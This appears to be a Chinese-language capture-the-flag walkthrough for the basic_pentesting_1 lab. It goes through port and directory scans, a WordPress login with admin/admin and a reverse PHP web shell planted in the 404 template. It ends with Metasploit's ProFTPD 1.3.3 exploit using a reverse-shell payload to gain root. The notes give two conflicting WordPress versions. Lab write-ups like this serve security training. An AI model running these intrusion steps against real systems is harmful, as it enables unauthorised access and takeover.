靶机来源-basic_pentesting_1【VX订阅号:0x00实验室】

basic_pentesting_1【VX订阅号:0x00实验室】

arp-scan扫描靶机IP

masscan 192.168.253.153 --ports 0-65535 --rate=10000端口扫描

nmap扫描nmap -T5 -A -p- 192.168.253.153

21:ProFTPD 1.3.3

dirb http://192.168.253.153 目录扫描

http://192.168.253.153/secret/发现网站cms是wordpress

wpscan --url http://192.168.253.153/secret/

知道版本WordPress 4.9.24

msf没发现可利用漏洞

wpscan --url http://192.168.253.153/secret/ --enumerate u用户名枚举

admin/admin直接进来了

404界面写入phpshell

shell:反弹的phpwebshellphp-reverse-shell.php 默认目录及文件名/usr/share/webshells/php

把IP和port改成自己的,监听反弹

404监听不行,监听不到
WordPress 6.4.1

上传可以

在上传路径找到自己上传文件

换个方法

ftp端口开着

ProFTPD

搜索可利用模块search ProFTPD 1.3.3

设置payload,输入set payload cmd/unix/reverse、

设置目的地址和源地址

运行

获得root权限

相关推荐
Мартин.1 分钟前
[CISSP] [5] 保护资产安全
数据库·安全·oracle
wangjun515935 分钟前
linux,物理机、虚拟机,同时内外网实现方案;物理机与虚拟机互通网络;
linux·服务器·网络
Bruce-li__1 小时前
深入理解Python asyncio:从入门到实战,掌握异步编程精髓
网络·数据库·python
self-discipline6341 小时前
【计网速通】计算机网络核心知识点与高频考点——数据链路层(二)
网络·网络协议·计算机网络
叫醒你笛莎2 小时前
IGMP(Internet Group Management Protocol)与组播技术深度解析
网络
lulinhao2 小时前
HCIA/HCIP基础知识笔记汇总
网络·笔记
暴走的YH3 小时前
【网络协议】三次握手与四次挥手
网络·网络协议
yuzhangfeng3 小时前
【云计算物理网络】数据中心网络架构设计
网络·云计算
zhu12893035563 小时前
网络安全的重要性与防护措施
网络·安全·web安全
渗透测试老鸟-九青4 小时前
面试经验分享 | 成都渗透测试工程师二面面经分享
服务器·经验分享·安全·web安全·面试·职场和发展·区块链